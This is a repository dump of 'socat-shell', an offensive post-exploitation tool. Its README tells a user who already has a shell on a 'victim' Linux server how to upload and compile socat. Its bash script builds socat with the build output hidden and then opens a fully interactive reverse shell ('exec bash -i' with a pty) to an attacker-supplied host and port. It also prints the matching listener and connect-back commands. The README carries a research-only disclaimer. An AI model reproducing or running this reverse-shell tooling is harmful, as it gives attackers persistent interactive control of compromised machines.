├── socat.tar ├── socat-1.7.0.1.tar ├── license.txt ├── README.md └── socat-shell.sh /socat.tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cornerpirate/socat-shell/HEAD/socat.tar -------------------------------------------------------------------------------- /socat-1.7.0.1.tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cornerpirate/socat-shell/HEAD/socat-1.7.0.1.tar -------------------------------------------------------------------------------- /license.txt: -------------------------------------------------------------------------------- 1 | Copyright 2016 Paul Ritchie 2 | 3 | Licensed under the Apache License, Version 2.0 (the "License"); 4 | you may not use this file except in compliance with the License. 5 | You may obtain a copy of the License at 6 | 7 | http://www.apache.org/licenses/LICENSE-2.0 8 | 9 | Unless required by applicable law or agreed to in writing, software 10 | distributed under the License is distributed on an "AS IS" BASIS, 11 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | See the License for the specific language governing permissions and 13 | limitations under the License. 14 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # socat-shell 2 | 3 | When you get a shell on a linux server you get a really limited level of interactivity. 4 | You can use socat to establish a fully interactive shell which allows: 5 | * Tab autocompletion 6 | * Job management by CTRL+C and CTRL+Z etc 7 | * Bash history via CTRL+R etc. 8 | Basically you get bash as if you are SSHed into the target. 9 | 10 | In order to get this goodness you need to: 11 | * 1) Already have a shell on the victim 12 | * 2) Have a means of uploading files to the victim 13 | * 3) Have an established means of communicating to your listener (using TCP). 14 | This tool is not going to find any vulnerbilities for you, or confirm egress filtering. 15 | This will only be useful in elevating your existing shell to a more functional one. 16 | 17 | The victim must either have "socat" installed, or both "gcc" and "make" so that compilation is possible. 18 | 19 | Your listener server must have "socat" installed (by default on Kali). 20 | 21 | Upload the socat.tar file to your victim, and use your existing shell access to extract that. 22 | By executing "socat-shell.sh" you will achieve the following: 23 | * 1) Check for the existence of the "socat" binary in the current directory. 24 | * 2) If it does not find that then it will check for "gcc" and "make". 25 | * 3) If those pre-reqs are met, then it will extract the socat source and compile it 26 | * 4) When successful the binary for "socat" will now exist in the current directory. Additionally, the last lines of output will show how to start your listener and how to execute the connection back from the victim. 27 | 28 | Dislaimer 29 | 30 | For research purposes only, do not use this on any target which you do not have permission to do so. 31 | -------------------------------------------------------------------------------- /socat-shell.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #Copyright 2016 Paul Ritchie 3 | # 4 | #Licensed under the Apache License, Version 2.0 (the "License"); 5 | #you may not use this file except in compliance with the License. 6 | #You may obtain a copy of the License at 7 | # 8 | # http://www.apache.org/licenses/LICENSE-2.0 9 | # 10 | #Unless required by applicable law or agreed to in writing, software 11 | #distributed under the License is distributed on an "AS IS" BASIS, 12 | #WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | #See the License for the specific language governing permissions and 14 | #limitations under the License. 15 | if [ -e "./socat" ]; then 16 | echo "socat already compiled in current directory" 17 | echo "moving on to establishing connection" 18 | else 19 | echo "socat NOT compiled in current dir, extracting and compiling" 20 | # check for gcc and make 21 | if [ -z `which gcc` ] || [ -z `which make` ]; then 22 | echo "Unfortunately gcc or make is not installed" 23 | echo "we won't be able to compile socat on this target today" 24 | exit -1 25 | fi 26 | # unpack socak source 27 | tar xf socat-1.7.0.1.tar 28 | echo "Extracted socat to: socat-1.7.3.1" 29 | # change working directory 30 | cd socat-1.7.0.1 31 | echo "Changed directory to: " `pwd` 32 | ./configure &> ../configure-log.txt # hide the output 33 | make &> ../make-log.txt # hide the output 34 | if [ -e "./socat" ]; then 35 | echo "compilation successful, socat found." 36 | cp socat ../ 37 | cd ../ 38 | echo "Changed directory to: " `pwd` 39 | else 40 | echo "$file not found, check log files configure-log.txt & make-log.txt" 41 | exit -1 42 | fi 43 | fi 44 | 45 | # if we get here then socat binary has been compiled and we have a copy in this directory 46 | echo "====================" 47 | echo "Start listener on attacker's host:" 48 | echo "user@attacker ~: socat -,raw,echo=0 tcp-listen:4545" 49 | echo "====================" 50 | echo "Run socat from victim to connect back:" 51 | echo "user@victim ~: socat tcp:: exec:\"bash -i\",pty,stderr,setsid,sigint,sane" 52 | echo "=====================" 53 | if [ -z "$1" ] && [ -z "$2" ]; then 54 | echo "No arguments provided, please enter the command shown above with host and port" 55 | exit -1 56 | else 57 | echo "Attempting to execute against host $1 and port $2" 58 | ./socat tcp:$1:$2 exec:"bash -i",pty,stderr,setsid,sigint,sane 59 | fi 60 | --------------------------------------------------------------------------------